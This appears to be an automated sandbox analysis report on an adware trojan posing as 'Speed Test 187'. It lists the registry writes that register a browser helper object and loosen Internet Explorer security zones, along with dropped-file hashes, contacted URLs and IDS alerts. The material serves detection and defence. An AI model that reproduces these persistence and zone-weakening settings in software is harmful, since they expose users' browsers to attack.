[HKCR\Speed Test 187.ScriptHostObject.1\CLSID]
"(Default)" = "{4A3FC207-C86D-4F11-890A-CA9F75578303}"

[HKCR\CLSID\{4A3FC207-C86D-4F11-890A-CA9F75578303}\ProgID]
"(Default)" = "Speed Test 187.ScriptHostObject.1"

[HKCR\TypeLib\{30CC01EB-B247-44A6-8E32-59736942ECC0}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{4A3FC207-C86D-4F11-890A-CA9F75578303}\InprocServer32]
"(Default)" = "%Program Files%\Speed Test 187\ScriptHost.dll"

[HKCU\Software\Speed Test 187]
"installId" = "BD0CAE40-FA0F-485f-886C-43C15CEFD364"

[HKCR\Interface\{1348BD1B-C32A-41A7-9BD4-5377AA1AB925}]
"(Default)" = "ITool"

[HKCR\TypeLib\{30CC01EB-B247-44A6-8E32-59736942ECC0}\1.0\0\win32]
"(Default)" = "%Program Files%\Speed Test 187\ScriptHost.dll"

[HKCR\Speed Test 187.Tool\CLSID]
"(Default)" = "{20EFA753-0D46-4E16-B58D-648F591861CB}"

[HKCR\Speed Test 187.Tool\CurVer]
"(Default)" = "Speed Test 187.Tool.1"

[HKCR\CLSID\{4A3FC207-C86D-4F11-890A-CA9F75578303}]
"(Default)" = "Speed Test 187"

[HKCR\CLSID\{4A3FC207-C86D-4F11-890A-CA9F75578303}\TypeLib]
"(Default)" = "{30CC01EB-B247-44A6-8E32-59736942ECC0}"

[HKCR\AppID\{562B9316-C08A-444A-9482-62080DD851AE}]
"(Default)" = "Speed Test 187"

[HKCR\CLSID\{20EFA753-0D46-4E16-B58D-648F591861CB}]
"(Default)" = "Tool Class"

[HKCR\Speed Test 187.ScriptHostObject\CLSID]
"(Default)" = "{4A3FC207-C86D-4F11-890A-CA9F75578303}"

[HKCR\TypeLib\{30CC01EB-B247-44A6-8E32-59736942ECC0}\1.0]
"(Default)" = "ScriptHost 1.0 Type Library"

[HKCR\AppID\ScriptHost.DLL]
"AppID" = "{562B9316-C08A-444A-9482-62080DD851AE}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 FA 50 DC 79 5C 75 04 C5 95 AF 41 CC A0 A2 4C"

[HKCR\Speed Test 187.Tool]
"(Default)" = "Tool Class"

[HKCR\Speed Test 187.ScriptHostObject]
"(Default)" = "Speed Test 187"

[HKCR\CLSID\{4A3FC207-C86D-4F11-890A-CA9F75578303}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{1348BD1B-C32A-41A7-9BD4-5377AA1AB925}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{1348BD1B-C32A-41A7-9BD4-5377AA1AB925}\TypeLib]
"Version" = "1.0"

[HKCR\Speed Test 187.Tool.1]
"(Default)" = "Tool Class"

[HKCR\Speed Test 187.ScriptHostObject.1]
"(Default)" = "Speed Test 187"

[HKCR\Speed Test 187.Tool.1\CLSID]
"(Default)" = "{20EFA753-0D46-4E16-B58D-648F591861CB}"

[HKCR\CLSID\{20EFA753-0D46-4E16-B58D-648F591861CB}\TypeLib]
"(Default)" = "{30CC01EB-B247-44A6-8E32-59736942ECC0}"

[HKCR\CLSID\{20EFA753-0D46-4E16-B58D-648F591861CB}\InprocServer32]
"ThreadingModel" = "Apartment"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{4A3FC207-C86D-4F11-890A-CA9F75578303}]
"NoExplorer" = "1"

The process install_helper_IE.exe:604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 94 9A 83 33 77 FB 09 6B 33 26 CB 37 E0 17 41"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{4A3FC207-C86D-4F11-890A-CA9F75578303}]
"Flags" = "0"

[HKCU\Software\Microsoft\Internet Explorer\Approved Extensions]
"{4A3FC207-C86D-4F11-890A-CA9F75578303}" = "51 66 7A 6C 4C 1D 3B 1B 17 DD 25 57 5E 99 7D 05"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{4A3FC207-C86D-4F11-890A-CA9F75578303}]
"Version" = "*"

The process speedtest187.exe:356 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Speed Test 187]
"URLInfoAbout" = "http://www.speedanalysis.com/"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"taskkill.exe" = "Kill Process"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Speed Test 187]
"DisplayIcon" = "%Program Files%\Speed Test 187\uninstall.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Internet Explorer\MINIE]
"CommandBarEnabled" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Speed Test 187]
"Publisher" = "Speed Test"
"DisplayName" = "Speed Test 187"

"instdir" = "%Program Files%\Speed Test 187"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6A AB AF FD D4 EE 9F 67 4F 23 83 93 34 C5 78 65"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Speed Test 187]
"UninstallString" = "%Program Files%\Speed Test 187\uninstall.exe"
"DisplayVersion" = "3.0.0.0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

Dropped PE files

MD5 File path
6f3836f88650b30d234607ea90ac8513 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\PCP SpeedTest_187\Hash_HMAC.dll
db2927610df2ff9888b394a3c8a918db c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\PCP SpeedTest_187\PCPerformerSetup.exe
34c00546ff4ef8a79d0a64d0b960a787 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\PCP SpeedTest_187\SpeedTest.exe
bd23a611a8a2c22a6944f92825164ffa c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\speedtest187\install_helper.exe
bd23a611a8a2c22a6944f92825164ffa c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\speedtest187\install_helper_FF.exe
bd23a611a8a2c22a6944f92825164ffa c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\speedtest187\install_helper_IE.exe
23bcac4a7c2f60a37937a9b484d18cda c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\speedtest187\speedtest187.exe
34c00546ff4ef8a79d0a64d0b960a787 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\speedtest187Setup[1].exe
db2927610df2ff9888b394a3c8a918db c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\PCPerformerSetup_genericv3[1].exe
585a696b6f4b05ad834bdc914bcb67c4 c:\Program Files\PC Performer\CleanSchedule.exe
03a4ba08f44d8c0efa2bbd9c7b3ad341 c:\Program Files\PC Performer\PCPerformer.dll
26135c4c84d63aa01b4bb20d8d2208ec c:\Program Files\PC Performer\PCPerformer.exe
a0c2f8f26ac379d5ff10073cb86c6822 c:\Program Files\PC Performer\isxdl.dll
3363b73d1a770440bd96214026dbd53e c:\Program Files\PC Performer\unins000.exe
71a2dca8f626fcef8bff7e2c17c67a7f c:\Program Files\PC Performer\xmllite.dll
e2cb5a6f64c60aaceb387e4d5146ac54 c:\Program Files\Speed Test 187\AddonsFramework.Typelib.dll
1ff1e74d7d66ba59900398511ace3cb6 c:\Program Files\Speed Test 187\AddonsFramework.Typelib64.dll
668796a2b31e2d971dc78872b2f7da2a c:\Program Files\Speed Test 187\BackgroundHost.exe
fa7bd72fcddd1e370f936a9386f5f358 c:\Program Files\Speed Test 187\BackgroundHost64.exe
b9ceee3108905b38e5ae32ab44968a56 c:\Program Files\Speed Test 187\ButtonSite.dll
fd77f02f5047e9bc75ff9c8ac642905d c:\Program Files\Speed Test 187\ButtonSite64.dll
b7d7ca9989bff651582021d283cffd76 c:\Program Files\Speed Test 187\ScriptHost.dll
169366dbbd04f38604c29dfc2d4773f1 c:\Program Files\Speed Test 187\ScriptHost64.dll
98b17f4587d8236a883077ad8d67c4ab c:\Program Files\Speed Test 187\uninstall.exe
ea3cca7c354681ada6fb436537713011 c:\Program Files\Speed Test 187\uninstall_nsis.exe
b1ec55fff33635ba5faf87c95b2b53ac c:\WINDOWS\system32\roboot.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 25152 25600 4.45121 1a752074fcd11165f6f148ea63ebe068
.rdata 32768 6346 6656 3.38143 7eb0899a4b6211f8bc545228417d92ad
.data 40960 419452 512 0.94179 b0b1d7c362f8cc76541b7fce5014e602
.ndata 462848 839680 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 1302528 2552 2560 3.15979 a507cfd8d1f72e833c66c1724b493d32

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://api.ibario.com/utils/dns
hxxp://www.ibbalance.com/service/country.php
hxxp://api.ibario.com/events
hxxp://www.ibbalance.com/files/components/speedtest187Setup.exe
hxxp://www.ibbalance.com/files/products/PCPerformerSetup_genericv3.exe
hxxp://loadbalancer1.ibariocorp.com/speedtest/?cid=4751
hxxp://gp1.wac.v2cdn.net/js/130131868.js
hxxp://e6640.g.akamaiedge.net/js/geo2.js
hxxp://googleapis.l.google.com/css?family=Open Sans:400,600,700,800
hxxp://loadbalancer1.ibariocorp.com/speedtest/media/style.css
hxxp://loadbalancer1.ibariocorp.com/speedtest/media/bg.jpg
hxxp://googlehosted.l.googleusercontent.com/static/fonts/opensans/v9/cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE.eot
hxxp://code.jquery.netdna-cdn.com/jquery-1.9.1.min.js
hxxp://www-google-analytics.l.google.com/analytics.js
hxxp://googleapis.l.google.com/ajax/libs/jquery/1.9.1/jquery.min.js
hxxp://www-google-analytics.l.google.com/collect?v=1&_v=j24&a=1357867663&t=pageview&_s=1&dl=http://www.performersoft.com/speedtest/?cid=4751&ul=en-us&de=utf-8&dt=PerformerSoft Speed Test&sd=32-bit&sr=1276x846&vp=1276x697&je=0&fl=11.6 r602&_u=ME~&cid=476553240.1407549896&tid=UA-42277600-10&z=1548146158
hxxp://loadbalancer1.ibariocorp.com/speedtest/media/speed-analisys.png
hxxp://loadbalancer1.ibariocorp.com/speedtest/media/body-bg.jpg
hxxp://loadbalancer1.ibariocorp.com/component/js/swfobject.js
hxxp://loadbalancer1.ibariocorp.com/component/img/banner-pcp.png
hxxp://loadbalancer1.ibariocorp.com/component/img/banner-sa.png
hxxp://ib.anycast.adnxs.com/ttj?id=3222726&referrer=[REFERRER_URL]
hxxp://loadbalancer1.ibariocorp.com/component/img/whitebg.png
hxxp://loadbalancer1.ibariocorp.com/speedtest/media/PaUkffsP_bigger.gif
hxxp://loadbalancer1.ibariocorp.com/speedtest/media/footer.jpg
hxxp://ib.anycast.adnxs.com/bounce?/ttj?id=3222726&referrer=[REFERRER_URL]
hxxp://ib.anycast.adnxs.com/ttj?ttjb=1&bdc=1407549908&bdh=B-C0wF_vJGE4ovFan2_T-SXXLqk.&bdref=http://www.performersoft.com/speedtest/?cid=4751&bdtop=true&bdifs=1&id=3222726&referrer=[REFERRER_URL]
hxxp://ib.anycast.adnxs.com/ttj?id=3222725&referrer=[REFERRER_URL]
hxxp://ib.anycast.adnxs.com/ttj?ttjb=1&bdc=1407549908&bdh=B-C0wF_vJGE4ovFan2_T-SXXLqk.&bdref=http://www.performersoft.com/speedtest/?cid=4751&bdtop=true&bdifs=1&id=3222725&referrer=[REFERRER_URL]
hxxp://a1961.g.akamai.net/p/03/ca/cc/7d/03cacc7d05899aea99056522d1bc9eb6.swf
hxxp://a1961.g.akamai.net/p/03/ca/cc/7d/03cacc7d05899aea99056522d1bc9eb6.swf?clickTAG=http://nym1.ib.adnxs.com/click?oOnlu991iz92hej14raIP6RwPQrXo9g_doXo9eK2iD-f6eW733WLP_6cUIxk4dRkD13e5zAod23UgeVTAAAAAMUsMQDPCAAAnwMAAAIAAAD_cAgBgR4HAAAAAQBVU0QAVVNEACwB-gAbxAAAPeQAAgUAAQIAAJIALC7cfwAAAAA./cnd=%21JgYwOgiTxpcCEP_hoQgYgb0cIAA./referrer=http%3A%2F%2Fwww.performersoft.com%2Fspeedtest%2F%3Fcid%3D4751/clickenc=http%3A%2F%2Ftrack.popmog.com%2Fc%2F2047049%2Fclick%3Fsubid%3D3222725%26sspdata%3Dnym1CI-6-b6Ohsq7bRACGP65wuLIrLjqZCIPMTkzLjEzOC4yNDQuMjMxKAEw1IOWnwU.
hxxp://a1961.g.akamai.net/ANX_async_usersync.js
hxxp://pagead.l.doubleclick.net/pagead/conversion.js
hxxp://pagead.l.doubleclick.net/pagead/conversion/993973503/?random=1407549900333&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751
hxxp://www-google-analytics.l.google.com/ga.js
hxxp://pagead.l.doubleclick.net/pagead/conversion/983437618/?random=1407549900333&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751
hxxp://www-google-analytics.l.google.com/__utm.gif?utmwv=5.5.4&utms=1&utmn=183511789&utmhn=www.performersoft.com&utmcs=utf-8&utmsr=1276x846&utmvp=1260x697&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=PerformerSoft Speed Test&utmhid=1357867663&utmr=-&utmp=/3850509559/goal&utmht=1407549900552&utmac=UA-16085399-2&utmcc=__utma=125033355.476553240.1407549896.1407549901.1407549901.1;+__utmz=125033355.1407549901.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=DACAAAAAAAAAAAAAAAAB~
hxxp://loadbalancer1.ibariocorp.com/component/logics.swf?nocache=9082
hxxp://pagead46.l.doubleclick.net/pagead/viewthroughconversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0
hxxp://loadbalancer4.ibariocorp.com/cookie.php?cid=4751
hxxp://pagead46.l.doubleclick.net/pagead/viewthroughconversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0
hxxp://www-google-analytics.l.google.com/cse/intl/en/images/google_custom_search_watermark.gif
hxxp://www-google-analytics.l.google.com/ads/conversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=1841122896
hxxp://e3821.dspe1.akamaiedge.net/en_US/fbds.js
hxxp://www-google-analytics.l.google.com/ads/conversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=2164007956
hxxp://loadbalancer1.ibariocorp.com/component/config.xml
hxxp://loadbalancer1.ibariocorp.com/component/gateway.php
hxxp://www-google-analytics.l.google.com/ads/conversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=2164007956&ipr=y
hxxp://www-google-analytics.l.google.com/ads/conversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=1841122896&ipr=y
hxxp://loadbalancer1.ibariocorp.com/component/graphics.swf?nocache=413332.6606824994
hxxp://www.zulagames.com/cookie.php?cid=4751
hxxp://www.google-analytics.com/__utm.gif?utmwv=5.5.4&utms=1&utmn=183511789&utmhn=www.performersoft.com&utmcs=utf-8&utmsr=1276x846&utmvp=1260x697&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=PerformerSoft Speed Test&utmhid=1357867663&utmr=-&utmp=/3850509559/goal&utmht=1407549900552&utmac=UA-16085399-2&utmcc=__utma=125033355.476553240.1407549896.1407549901.1407549901.1;+__utmz=125033355.1407549901.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=DACAAAAAAAAAAAAAAAAB~
hxxp://code.jquery.com/jquery-1.9.1.min.js
hxxp://www.performersoft.com/speedtest/?cid=4751
hxxp://cdn.adnxs.com/ANX_async_usersync.js 67.132.183.48
hxxp://ib.adnxs.com/ttj?ttjb=1&bdc=1407549908&bdh=B-C0wF_vJGE4ovFan2_T-SXXLqk.&bdref=http://www.performersoft.com/speedtest/?cid=4751&bdtop=true&bdifs=1&id=3222725&referrer=[REFERRER_URL]
hxxp://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js
hxxp://googleads.g.doubleclick.net/pagead/viewthroughconversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0
hxxp://ib.adnxs.com/bounce?/ttj?id=3222726&referrer=[REFERRER_URL]
hxxp://www.performersoft.com/speedtest/media/bg.jpg
hxxp://www.google.com.ua/ads/conversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=1841122896&ipr=y
hxxp://connect.facebook.net/en_US/fbds.js
hxxp://cdn.adnxs.com/p/03/ca/cc/7d/03cacc7d05899aea99056522d1bc9eb6.swf?clickTAG=http://nym1.ib.adnxs.com/click?oOnlu991iz92hej14raIP6RwPQrXo9g_doXo9eK2iD-f6eW733WLP_6cUIxk4dRkD13e5zAod23UgeVTAAAAAMUsMQDPCAAAnwMAAAIAAAD_cAgBgR4HAAAAAQBVU0QAVVNEACwB-gAbxAAAPeQAAgUAAQIAAJIALC7cfwAAAAA./cnd=%21JgYwOgiTxpcCEP_hoQgYgb0cIAA./referrer=http%3A%2F%2Fwww.performersoft.com%2Fspeedtest%2F%3Fcid%3D4751/clickenc=http%3A%2F%2Ftrack.popmog.com%2Fc%2F2047049%2Fclick%3Fsubid%3D3222725%26sspdata%3Dnym1CI-6-b6Ohsq7bRACGP65wuLIrLjqZCIPMTkzLjEzOC4yNDQuMjMxKAEw1IOWnwU. 67.132.183.48
hxxp://ib.adnxs.com/ttj?id=3222725&referrer=[REFERRER_URL]
hxxp://www.google-analytics.com/analytics.js
hxxp://www.performersoft.com/speedtest/media/footer.jpg
hxxp://www.performersoft.com/component/gateway.php
hxxp://fonts.googleapis.com/css?family=Open Sans:400,600,700,800
hxxp://www.appregis.com/service/country.php
hxxp://www.performersoft.com/component/logics.swf?nocache=9082
hxxp://www.performersoft.com/component/graphics.swf?nocache=413332.6606824994
hxxp://ib.adnxs.com/ttj?id=3222726&referrer=[REFERRER_URL]
hxxp://googleads.g.doubleclick.net/pagead/viewthroughconversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0
hxxp://www.googleadservices.com/pagead/conversion/983437618/?random=1407549900333&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751 173.194.43.77
hxxp://cdn3.optimizely.com/js/geo2.js 23.218.45.136
hxxp://cdn.adnxs.com/p/03/ca/cc/7d/03cacc7d05899aea99056522d1bc9eb6.swf 67.132.183.48
hxxp://www.google.com/ads/conversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=2164007956
hxxp://www.performersoft.com/component/img/banner-sa.png
hxxp://www.performersoft.com/component/img/whitebg.png
hxxp://www.google.com/cse/intl/en/images/google_custom_search_watermark.gif
hxxp://www.google.com.ua/ads/conversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=2164007956&ipr=y
hxxp://cdn.optimizely.com/js/130131868.js
hxxp://www.performersoft.com/speedtest/media/PaUkffsP_bigger.gif
hxxp://www.googleadservices.com/pagead/conversion.js 173.194.43.77
hxxp://ib.adnxs.com/ttj?ttjb=1&bdc=1407549908&bdh=B-C0wF_vJGE4ovFan2_T-SXXLqk.&bdref=http://www.performersoft.com/speedtest/?cid=4751&bdtop=true&bdifs=1&id=3222726&referrer=[REFERRER_URL]
hxxp://www.performersoft.com/component/config.xml
hxxp://www.google-analytics.com/collect?v=1&_v=j24&a=1357867663&t=pageview&_s=1&dl=http://www.performersoft.com/speedtest/?cid=4751&ul=en-us&de=utf-8&dt=PerformerSoft Speed Test&sd=32-bit&sr=1276x846&vp=1276x697&je=0&fl=11.6 r602&_u=ME~&cid=476553240.1407549896&tid=UA-42277600-10&z=1548146158
hxxp://www.performersoft.com/component/js/swfobject.js
hxxp://www.appregis.com/files/components/speedtest187Setup.exe
hxxp://www.performersoft.com/speedtest/media/speed-analisys.png
hxxp://www.googleadservices.com/pagead/conversion/993973503/?random=1407549900333&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751 173.194.43.77
hxxp://www.performersoft.com/component/img/banner-pcp.png
hxxp://www.performersoft.com/speedtest/media/style.css
hxxp://www.google-analytics.com/ga.js
hxxp://themes.googleusercontent.com/static/fonts/opensans/v9/cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE.eot
hxxp://www.performersoft.com/speedtest/media/body-bg.jpg
hxxp://www.google.com/ads/conversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=1841122896
hxxp://www.appregis.com/files/products/PCPerformerSetup_genericv3.exe
www.facebook.com 31.13.74.144


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET MALWARE Possible Windows executable sent when remote host claims to send html content
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET POLICY Outdated Windows Flash Version IE

Traffic

<font color="red">GET /pagead/conversion.js HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.googleadservices.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
P3P: policyref="hXXp://VVV.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"<br>
Content-Type: text/javascript; charset=UTF-8<br>
ETag: 10951747834593842486<br>
Date: Fri, 08 Aug 2014 04:28:26 GMT<br>
Expires: Sat, 09 Aug 2014 04:28:26 GMT<br>
X-Content-Type-Options: nosniff<br>
Content-Disposition: attachment; filename="f.txt"<br>
